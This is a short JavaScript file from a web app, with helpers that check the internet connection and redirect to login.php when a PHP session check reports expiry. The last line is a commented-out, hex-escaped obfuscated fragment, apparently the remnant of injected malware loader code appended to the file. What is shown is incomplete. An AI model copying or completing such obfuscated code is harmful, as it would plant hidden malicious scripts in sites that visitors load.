        function checkWheatherLogoutOrNot_InternetConnection() {
            if (navigator.onLine) {// check internet connection.
                 $.get(BASE_URL+'php/checkForSessionExpire.php', // url
                function (respone, textStatus, jqXHR) { // success callback
                    if (respone) {                      //if session Expires = true
                        window.location = BASE_URL+"login.php";
                    }
                }); 
                return true;
            }else{
                return false;
                //alert("check your Internet connection");
            }
           
        }
        function alertNoInternet_connection(){
            alert("check your Internet connection");
        }


    // for some of unchecked files used 
        function checkInternetConnection() {
            if (navigator.onLine) {// check internet connection
           /*      $.get('php/checkForSessionExpire.php', // url
                function (respone, textStatus, jqXHR) { // success callback
                    if (respone) {
                        window.location = "login.php";
                    }
                });*/
                return true;
            }else{
               
                 return false;
            }
           
        }
        
//return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};;;